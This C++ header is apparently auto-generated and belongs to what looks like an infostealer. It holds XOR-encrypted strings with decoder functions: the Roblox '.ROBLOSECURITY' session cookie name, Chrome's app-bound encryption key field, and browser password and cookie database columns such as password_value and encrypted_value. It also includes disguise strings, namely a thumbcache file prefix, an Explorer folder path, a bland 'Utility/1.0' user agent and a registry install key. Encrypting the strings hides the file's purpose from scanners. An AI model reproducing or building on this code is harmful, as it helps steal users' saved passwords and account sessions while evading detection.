#pragma once
// AUTO-GENERATED by strings_enc.py ΓÇö do not edit by hand.
// Each plaintext is stored as an XOR-encrypted byte array.
// Decode at use with name_str() ΓÇö returns std::string.
#define STR_KEY 0x5a

#include <cstdint>
#include <cstring>
#include <string>

namespace s {
// '.ROBLOSECURITY'
static const uint8_t kROBLOSECURITY[] = { 0x74, 0x08, 0x15, 0x18, 0x16, 0x15, 0x09, 0x1f, 0x19, 0x0f, 0x08, 0x13, 0x0e, 0x03 };
static const size_t kROBLOSECURITY_len = sizeof(kROBLOSECURITY);
static inline std::string kROBLOSECURITY_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kROBLOSECURITY_len);
    for (size_t i = 0; i < kROBLOSECURITY_len; i++)
        cached += (char)(kROBLOSECURITY[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kROBLOSECURITY_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kROBLOSECURITY_len);
    for (size_t i = 0; i < kROBLOSECURITY_len; i++)
        cached += (wchar_t)(kROBLOSECURITY[i] ^ STR_KEY);
    return cached;
}

// 'thumbcache_'
static const uint8_t kThumbPrefix[] = { 0x2e, 0x32, 0x2f, 0x37, 0x38, 0x39, 0x3b, 0x39, 0x32, 0x3f, 0x05 };
static const size_t kThumbPrefix_len = sizeof(kThumbPrefix);
static inline std::string kThumbPrefix_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kThumbPrefix_len);
    for (size_t i = 0; i < kThumbPrefix_len; i++)
        cached += (char)(kThumbPrefix[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kThumbPrefix_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kThumbPrefix_len);
    for (size_t i = 0; i < kThumbPrefix_len; i++)
        cached += (wchar_t)(kThumbPrefix[i] ^ STR_KEY);
    return cached;
}

// 'app_bound_encrypted_key'
static const uint8_t kAppBoundKey[] = { 0x3b, 0x2a, 0x2a, 0x05, 0x38, 0x35, 0x2f, 0x34, 0x3e, 0x05, 0x3f, 0x34, 0x39, 0x28, 0x23, 0x2a, 0x2e, 0x3f, 0x3e, 0x05, 0x31, 0x3f, 0x23 };
static const size_t kAppBoundKey_len = sizeof(kAppBoundKey);
static inline std::string kAppBoundKey_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kAppBoundKey_len);
    for (size_t i = 0; i < kAppBoundKey_len; i++)
        cached += (char)(kAppBoundKey[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kAppBoundKey_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kAppBoundKey_len);
    for (size_t i = 0; i < kAppBoundKey_len; i++)
        cached += (wchar_t)(kAppBoundKey[i] ^ STR_KEY);
    return cached;
}

// 'app_bound_encrypted_key'
static const uint8_t kAppBoundEncKey[] = { 0x3b, 0x2a, 0x2a, 0x05, 0x38, 0x35, 0x2f, 0x34, 0x3e, 0x05, 0x3f, 0x34, 0x39, 0x28, 0x23, 0x2a, 0x2e, 0x3f, 0x3e, 0x05, 0x31, 0x3f, 0x23 };
static const size_t kAppBoundEncKey_len = sizeof(kAppBoundEncKey);
static inline std::string kAppBoundEncKey_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kAppBoundEncKey_len);
    for (size_t i = 0; i < kAppBoundEncKey_len; i++)
        cached += (char)(kAppBoundEncKey[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kAppBoundEncKey_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kAppBoundEncKey_len);
    for (size_t i = 0; i < kAppBoundEncKey_len; i++)
        cached += (wchar_t)(kAppBoundEncKey[i] ^ STR_KEY);
    return cached;
}

// 'RobloxCookies.dat'
static const uint8_t kCookieFile[] = { 0x08, 0x35, 0x38, 0x36, 0x35, 0x22, 0x19, 0x35, 0x35, 0x31, 0x33, 0x3f, 0x29, 0x74, 0x3e, 0x3b, 0x2e };
static const size_t kCookieFile_len = sizeof(kCookieFile);
static inline std::string kCookieFile_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kCookieFile_len);
    for (size_t i = 0; i < kCookieFile_len; i++)
        cached += (char)(kCookieFile[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kCookieFile_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kCookieFile_len);
    for (size_t i = 0; i < kCookieFile_len; i++)
        cached += (wchar_t)(kCookieFile[i] ^ STR_KEY);
    return cached;
}

// 'CookiesData'
static const uint8_t kCookieDataField[] = { 0x19, 0x35, 0x35, 0x31, 0x33, 0x3f, 0x29, 0x1e, 0x3b, 0x2e, 0x3b };
static const size_t kCookieDataField_len = sizeof(kCookieDataField);
static inline std::string kCookieDataField_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kCookieDataField_len);
    for (size_t i = 0; i < kCookieDataField_len; i++)
        cached += (char)(kCookieDataField[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kCookieDataField_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kCookieDataField_len);
    for (size_t i = 0; i < kCookieDataField_len; i++)
        cached += (wchar_t)(kCookieDataField[i] ^ STR_KEY);
    return cached;
}

// 'rbxutil'
static const uint8_t kDiscordUser[] = { 0x28, 0x38, 0x22, 0x2f, 0x2e, 0x33, 0x36 };
static const size_t kDiscordUser_len = sizeof(kDiscordUser);
static inline std::string kDiscordUser_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kDiscordUser_len);
    for (size_t i = 0; i < kDiscordUser_len; i++)
        cached += (char)(kDiscordUser[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kDiscordUser_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kDiscordUser_len);
    for (size_t i = 0; i < kDiscordUser_len; i++)
        cached += (wchar_t)(kDiscordUser[i] ^ STR_KEY);
    return cached;
}

// 'Utility/1.0'
static const uint8_t kUA[] = { 0x0f, 0x2e, 0x33, 0x36, 0x33, 0x2e, 0x23, 0x75, 0x6b, 0x74, 0x6a };
static const size_t kUA_len = sizeof(kUA);
static inline std::string kUA_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kUA_len);
    for (size_t i = 0; i < kUA_len; i++)
        cached += (char)(kUA[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kUA_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kUA_len);
    for (size_t i = 0; i < kUA_len; i++)
        cached += (wchar_t)(kUA[i] ^ STR_KEY);
    return cached;
}

// 'Software\\Utility'
static const uint8_t kPipInstallKey[] = { 0x09, 0x35, 0x3c, 0x2e, 0x2d, 0x3b, 0x28, 0x3f, 0x06, 0x0f, 0x2e, 0x33, 0x36, 0x33, 0x2e, 0x23 };
static const size_t kPipInstallKey_len = sizeof(kPipInstallKey);
static inline std::string kPipInstallKey_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kPipInstallKey_len);
    for (size_t i = 0; i < kPipInstallKey_len; i++)
        cached += (char)(kPipInstallKey[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kPipInstallKey_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kPipInstallKey_len);
    for (size_t i = 0; i < kPipInstallKey_len; i++)
        cached += (wchar_t)(kPipInstallKey[i] ^ STR_KEY);
    return cached;
}

// 'InstallName'
static const uint8_t kInstallName[] = { 0x13, 0x34, 0x29, 0x2e, 0x3b, 0x36, 0x36, 0x14, 0x3b, 0x37, 0x3f };
static const size_t kInstallName_len = sizeof(kInstallName);
static inline std::string kInstallName_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kInstallName_len);
    for (size_t i = 0; i < kInstallName_len; i++)
        cached += (char)(kInstallName[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kInstallName_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kInstallName_len);
    for (size_t i = 0; i < kInstallName_len; i++)
        cached += (wchar_t)(kInstallName[i] ^ STR_KEY);
    return cached;
}

// 'InstallPath'
static const uint8_t kInstallPath[] = { 0x13, 0x34, 0x29, 0x2e, 0x3b, 0x36, 0x36, 0x0a, 0x3b, 0x2e, 0x32 };
static const size_t kInstallPath_len = sizeof(kInstallPath);
static inline std::string kInstallPath_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kInstallPath_len);
    for (size_t i = 0; i < kInstallPath_len; i++)
        cached += (char)(kInstallPath[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kInstallPath_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kInstallPath_len);
    for (size_t i = 0; i < kInstallPath_len; i++)
        cached += (wchar_t)(kInstallPath[i] ^ STR_KEY);
    return cached;
}

// 'CookiesVersion'
static const uint8_t kCookiesVer[] = { 0x19, 0x35, 0x35, 0x31, 0x33, 0x3f, 0x29, 0x0c, 0x3f, 0x28, 0x29, 0x33, 0x35, 0x34 };
static const size_t kCookiesVer_len = sizeof(kCookiesVer);
static inline std::string kCookiesVer_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kCookiesVer_len);
    for (size_t i = 0; i < kCookiesVer_len; i++)
        cached += (char)(kCookiesVer[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kCookiesVer_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kCookiesVer_len);
    for (size_t i = 0; i < kCookiesVer_len; i++)
        cached += (wchar_t)(kCookiesVer[i] ^ STR_KEY);
    return cached;
}

// 'CookiesData'
static const uint8_t kCookiesDataKey[] = { 0x19, 0x35, 0x35, 0x31, 0x33, 0x3f, 0x29, 0x1e, 0x3b, 0x2e, 0x3b };
static const size_t kCookiesDataKey_len = sizeof(kCookiesDataKey);
static inline std::string kCookiesDataKey_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kCookiesDataKey_len);
    for (size_t i = 0; i < kCookiesDataKey_len; i++)
        cached += (char)(kCookiesDataKey[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kCookiesDataKey_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kCookiesDataKey_len);
    for (size_t i = 0; i < kCookiesDataKey_len; i++)
        cached += (wchar_t)(kCookiesDataKey[i] ^ STR_KEY);
    return cached;
}

// 'host_key'
static const uint8_t kHostKeyCol[] = { 0x32, 0x35, 0x29, 0x2e, 0x05, 0x31, 0x3f, 0x23 };
static const size_t kHostKeyCol_len = sizeof(kHostKeyCol);
static inline std::string kHostKeyCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kHostKeyCol_len);
    for (size_t i = 0; i < kHostKeyCol_len; i++)
        cached += (char)(kHostKeyCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kHostKeyCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kHostKeyCol_len);
    for (size_t i = 0; i < kHostKeyCol_len; i++)
        cached += (wchar_t)(kHostKeyCol[i] ^ STR_KEY);
    return cached;
}

// 'name'
static const uint8_t kNameCol[] = { 0x34, 0x3b, 0x37, 0x3f };
static const size_t kNameCol_len = sizeof(kNameCol);
static inline std::string kNameCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kNameCol_len);
    for (size_t i = 0; i < kNameCol_len; i++)
        cached += (char)(kNameCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kNameCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kNameCol_len);
    for (size_t i = 0; i < kNameCol_len; i++)
        cached += (wchar_t)(kNameCol[i] ^ STR_KEY);
    return cached;
}

// 'encrypted_value'
static const uint8_t kValueCol[] = { 0x3f, 0x34, 0x39, 0x28, 0x23, 0x2a, 0x2e, 0x3f, 0x3e, 0x05, 0x2c, 0x3b, 0x36, 0x2f, 0x3f };
static const size_t kValueCol_len = sizeof(kValueCol);
static inline std::string kValueCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kValueCol_len);
    for (size_t i = 0; i < kValueCol_len; i++)
        cached += (char)(kValueCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kValueCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kValueCol_len);
    for (size_t i = 0; i < kValueCol_len; i++)
        cached += (wchar_t)(kValueCol[i] ^ STR_KEY);
    return cached;
}

// 'origin_url'
static const uint8_t kOriginCol[] = { 0x35, 0x28, 0x33, 0x3d, 0x33, 0x34, 0x05, 0x2f, 0x28, 0x36 };
static const size_t kOriginCol_len = sizeof(kOriginCol);
static inline std::string kOriginCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kOriginCol_len);
    for (size_t i = 0; i < kOriginCol_len; i++)
        cached += (char)(kOriginCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kOriginCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kOriginCol_len);
    for (size_t i = 0; i < kOriginCol_len; i++)
        cached += (wchar_t)(kOriginCol[i] ^ STR_KEY);
    return cached;
}

// 'hostname'
static const uint8_t kHostnameCol[] = { 0x32, 0x35, 0x29, 0x2e, 0x34, 0x3b, 0x37, 0x3f };
static const size_t kHostnameCol_len = sizeof(kHostnameCol);
static inline std::string kHostnameCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kHostnameCol_len);
    for (size_t i = 0; i < kHostnameCol_len; i++)
        cached += (char)(kHostnameCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kHostnameCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kHostnameCol_len);
    for (size_t i = 0; i < kHostnameCol_len; i++)
        cached += (wchar_t)(kHostnameCol[i] ^ STR_KEY);
    return cached;
}

// 'username_value'
static const uint8_t kUserCol[] = { 0x2f, 0x29, 0x3f, 0x28, 0x34, 0x3b, 0x37, 0x3f, 0x05, 0x2c, 0x3b, 0x36, 0x2f, 0x3f };
static const size_t kUserCol_len = sizeof(kUserCol);
static inline std::string kUserCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kUserCol_len);
    for (size_t i = 0; i < kUserCol_len; i++)
        cached += (char)(kUserCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kUserCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kUserCol_len);
    for (size_t i = 0; i < kUserCol_len; i++)
        cached += (wchar_t)(kUserCol[i] ^ STR_KEY);
    return cached;
}

// 'password_value'
static const uint8_t kPassCol[] = { 0x2a, 0x3b, 0x29, 0x29, 0x2d, 0x35, 0x28, 0x3e, 0x05, 0x2c, 0x3b, 0x36, 0x2f, 0x3f };
static const size_t kPassCol_len = sizeof(kPassCol);
static inline std::string kPassCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kPassCol_len);
    for (size_t i = 0; i < kPassCol_len; i++)
        cached += (char)(kPassCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kPassCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kPassCol_len);
    for (size_t i = 0; i < kPassCol_len; i++)
        cached += (wchar_t)(kPassCol[i] ^ STR_KEY);
    return cached;
}

// 'encrypted_username'
static const uint8_t kEncUserCol[] = { 0x3f, 0x34, 0x39, 0x28, 0x23, 0x2a, 0x2e, 0x3f, 0x3e, 0x05, 0x2f, 0x29, 0x3f, 0x28, 0x34, 0x3b, 0x37, 0x3f };
static const size_t kEncUserCol_len = sizeof(kEncUserCol);
static inline std::string kEncUserCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kEncUserCol_len);
    for (size_t i = 0; i < kEncUserCol_len; i++)
        cached += (char)(kEncUserCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kEncUserCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kEncUserCol_len);
    for (size_t i = 0; i < kEncUserCol_len; i++)
        cached += (wchar_t)(kEncUserCol[i] ^ STR_KEY);
    return cached;
}

// 'encrypted_password'
static const uint8_t kEncPassCol[] = { 0x3f, 0x34, 0x39, 0x28, 0x23, 0x2a, 0x2e, 0x3f, 0x3e, 0x05, 0x2a, 0x3b, 0x29, 0x29, 0x2d, 0x35, 0x28, 0x3e };
static const size_t kEncPassCol_len = sizeof(kEncPassCol);
static inline std::string kEncPassCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kEncPassCol_len);
    for (size_t i = 0; i < kEncPassCol_len; i++)
        cached += (char)(kEncPassCol[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kEncPassCol_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kEncPassCol_len);
    for (size_t i = 0; i < kEncPassCol_len; i++)
        cached += (wchar_t)(kEncPassCol[i] ^ STR_KEY);
    return cached;
}

// 'roblox.com'
static const uint8_t kRobloxCom[] = { 0x28, 0x35, 0x38, 0x36, 0x35, 0x22, 0x74, 0x39, 0x35, 0x37 };
static const size_t kRobloxCom_len = sizeof(kRobloxCom);
static inline std::string kRobloxCom_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kRobloxCom_len);
    for (size_t i = 0; i < kRobloxCom_len; i++)
        cached += (char)(kRobloxCom[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kRobloxCom_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kRobloxCom_len);
    for (size_t i = 0; i < kRobloxCom_len; i++)
        cached += (wchar_t)(kRobloxCom[i] ^ STR_KEY);
    return cached;
}

// '.roblox.com'
static const uint8_t kDotRobloxCom[] = { 0x74, 0x28, 0x35, 0x38, 0x36, 0x35, 0x22, 0x74, 0x39, 0x35, 0x37 };
static const size_t kDotRobloxCom_len = sizeof(kDotRobloxCom);
static inline std::string kDotRobloxCom_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kDotRobloxCom_len);
    for (size_t i = 0; i < kDotRobloxCom_len; i++)
        cached += (char)(kDotRobloxCom[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kDotRobloxCom_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kDotRobloxCom_len);
    for (size_t i = 0; i < kDotRobloxCom_len; i++)
        cached += (wchar_t)(kDotRobloxCom[i] ^ STR_KEY);
    return cached;
}

// '#HttpOnly_'
static const uint8_t kHttpOnlyPrefix[] = { 0x79, 0x12, 0x2e, 0x2e, 0x2a, 0x15, 0x34, 0x36, 0x23, 0x05 };
static const size_t kHttpOnlyPrefix_len = sizeof(kHttpOnlyPrefix);
static inline std::string kHttpOnlyPrefix_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kHttpOnlyPrefix_len);
    for (size_t i = 0; i < kHttpOnlyPrefix_len; i++)
        cached += (char)(kHttpOnlyPrefix[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kHttpOnlyPrefix_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kHttpOnlyPrefix_len);
    for (size_t i = 0; i < kHttpOnlyPrefix_len; i++)
        cached += (wchar_t)(kHttpOnlyPrefix[i] ^ STR_KEY);
    return cached;
}

// 'Microsoft\\Windows\\Explorer'
static const uint8_t kLocalAppData[] = { 0x17, 0x33, 0x39, 0x28, 0x35, 0x29, 0x35, 0x3c, 0x2e, 0x06, 0x0d, 0x33, 0x34, 0x3e, 0x35, 0x2d, 0x29, 0x06, 0x1f, 0x22, 0x2a, 0x36, 0x35, 0x28, 0x3f, 0x28 };
static const size_t kLocalAppData_len = sizeof(kLocalAppData);
static inline std::string kLocalAppData_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kLocalAppData_len);
    for (size_t i = 0; i < kLocalAppData_len; i++)
        cached += (char)(kLocalAppData[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kLocalAppData_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kLocalAppData_len);
    for (size_t i = 0; i < kLocalAppData_len; i++)
        cached += (wchar_t)(kLocalAppData[i] ^ STR_KEY);
    return cached;
}

// 'encryptedUsername'
static const uint8_t kEncUserKey[] = { 0x3f, 0x34, 0x39, 0x28, 0x23, 0x2a, 0x2e, 0x3f, 0x3e, 0x0f, 0x29, 0x3f, 0x28, 0x34, 0x3b, 0x37, 0x3f };
static const size_t kEncUserKey_len = sizeof(kEncUserKey);
static inline std::string kEncUserKey_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kEncUserKey_len);
    for (size_t i = 0; i < kEncUserKey_len; i++)
        cached += (char)(kEncUserKey[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kEncUserKey_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kEncUserKey_len);
    for (size_t i = 0; i < kEncUserKey_len; i++)
        cached += (wchar_t)(kEncUserKey[i] ^ STR_KEY);
    return cached;
}

// 'encryptedPassword'
static const uint8_t kEncPassKey[] = { 0x3f, 0x34, 0x39, 0x28, 0x23, 0x2a, 0x2e, 0x3f, 0x3e, 0x0a, 0x3b, 0x29, 0x29, 0x2d, 0x35, 0x28, 0x3e };
static const size_t kEncPassKey_len = sizeof(kEncPassKey);
static inline std::string kEncPassKey_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kEncPassKey_len);
    for (size_t i = 0; i < kEncPassKey_len; i++)
        cached += (char)(kEncPassKey[i] ^ STR_KEY);
    return cached;
}
static inline std::wstring kEncPassKey_wstr() {
    static std::wstring cached;
    if (!cached.empty()) return cached;
    cached.reserve(kEncPassKey_len);
    for (size_t i = 0; i < kEncPassKey_len; i++)
        cached += (wchar_t)(kEncPassKey[i] ^ STR_KEY);
    return cached;
}

// kExpiresCol
static const uint8_t kExpiresCol[] = { 0x70, 0x2b, 0x27, 0x2a, 0x2a, 0x2a, 0x2a, 0x2a, 0x2a, 0x2a, 0x2a, 0x68 };
static const size_t kExpiresCol_len = sizeof(kExpiresCol);
static inline std::string kExpiresCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kExpiresCol_len);
    for (size_t i = 0; i < kExpiresCol_len; i++)
        cached += (char)(kExpiresCol[i] ^ STR_KEY);
    return cached;
}
// kSecureCol
static const uint8_t kSecureCol[] = { 0x2b, 0x29, 0x2e, 0x2a, 0x29, 0x2a, 0x2c, 0x28 };
static const size_t kSecureCol_len = sizeof(kSecureCol);
static inline std::string kSecureCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kSecureCol_len);
    for (size_t i = 0; i < kSecureCol_len; i++)
        cached += (char)(kSecureCol[i] ^ STR_KEY);
    return cached;
}
// kHttpOnlyCol
static const uint8_t kHttpOnlyCol[] = { 0x2b, 0x29, 0x2f, 0x2a, 0x2a, 0x21, 0x2c, 0x21, 0x2a, 0x28 };
static const size_t kHttpOnlyCol_len = sizeof(kHttpOnlyCol);
static inline std::string kHttpOnlyCol_str() {
    static std::string cached;
    if (!cached.empty()) return cached;
    cached.reserve(kHttpOnlyCol_len);
    for (size_t i = 0; i < kHttpOnlyCol_len; i++)
        cached += (char)(kHttpOnlyCol[i] ^ STR_KEY);
    return cached;
}

} // namespace s
